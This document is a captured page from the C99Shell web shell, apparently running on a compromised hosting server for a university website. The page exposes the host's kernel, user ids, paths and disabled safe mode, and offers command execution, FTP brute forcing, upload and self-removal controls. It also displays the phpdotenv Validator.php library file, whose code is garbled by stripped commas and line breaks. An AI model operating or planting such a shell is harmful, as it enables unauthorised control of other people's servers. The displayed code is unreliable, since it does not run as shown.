!C99Shell v. 2.0 [PHP 7 Update] [25.02.2019]!

Software: Apache/2.2.22 (Debian). PHP/5.6.36 

uname -a: Linux h05.hvosting.ua 4.9.110-amd64 #3 SMP Sun Nov 4 16:27:09 UTC 2018 x86_64 

uid=1389(h33678) gid=1099(h33678) groups=1099(h33678),502(mgrsecure) 

Safe-mode: OFF (not secure)

/home/h33678/data/www/it-man.ztu.edu.ua/src/vendor/vlucas/phpdotenv/src/   drwxr-xr-x
Free 117.06 GB of 200.55 GB (58.37%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     Validator.php (3.1 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

namespace Dotenv;

use 
Dotenv\Exception\InvalidCallbackException;
use 
Dotenv\Exception\ValidationException;

/**
 * This is the validator class.
 *
 * It's responsible for applying validations against a number of variables.
 */
class Validator
{
    
/**
     * The variables to validate.
     *
     * @var array
     */
    
protected $variables;

    
/**
     * The loader instance.
     *
     * @var \Dotenv\Loader
     */
    
protected $loader;

    
/**
     * Create a new validator instance.
     *
     * @param array          $variables
     * @param \Dotenv\Loader $loader
     *
     * @return void
     */
    
public function __construct(array $variablesLoader $loader)
    {
        
$this->variables $variables;
        
$this->loader $loader;

        
$this->assertCallback(
            function (
$value) {
                return 
$value !== null;
            },
            
'is missing'
        
);
    }

    
/**
     * Assert that each variable is not empty.
     *
     * @return \Dotenv\Validator
     */
    
public function notEmpty()
    {
        return 
$this->assertCallback(
            function (
$value) {
                return 
strlen(trim($value)) > 0;
            },
            
'is empty'
        
);
    }

    
/**
     * Assert that each specified variable is an integer.
     *
     * @return \Dotenv\Validator
     */
    
public function isInteger()
    {
        return 
$this->assertCallback(
            function (
$value) {
                return 
ctype_digit($value);
            },
            
'is not an integer'
        
);
    }

    
/**
     * Assert that each variable is amongst the given choices.
     *
     * @param string[] $choices
     *
     * @return \Dotenv\Validator
     */
    
public function allowedValues(array $choices)
    {
        return 
$this->assertCallback(
            function (
$value) use ($choices) {
                return 
in_array($value$choices);
            },
            
'is not an allowed value'
        
);
    }

    
/**
     * Assert that the callback returns true for each variable.
     *
     * @param callable $callback
     * @param string   $message
     *
     * @throws \Dotenv\Exception\InvalidCallbackException|\Dotenv\Exception\ValidationException
     *
     * @return \Dotenv\Validator
     */
    
protected function assertCallback($callback$message 'failed callback assertion')
    {
        if (!
is_callable($callback)) {
            throw new 
InvalidCallbackException('The provided callback must be callable.');
        }

        
$variablesFailingAssertion = array();
        foreach (
$this->variables as $variableName) {
            
$variableValue $this->loader->getEnvironmentVariable($variableName);
            if (
call_user_func($callback$variableValue) === false) {
                
$variablesFailingAssertion[] = $variableName.$message";
            }
        }

        if (
count($variablesFailingAssertion) > 0) {
            throw new 
ValidationException(sprintf(
                
'One or more environment variables failed assertions: %s.',
                
implode(', '$variablesFailingAssertion)
            ));
        }

        return 
$this;
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.0 [PHP 7 Update] [25.02.2019] maintained by PinoyWH1Z | C99Shell Github | Generation time: 0.0135 ]--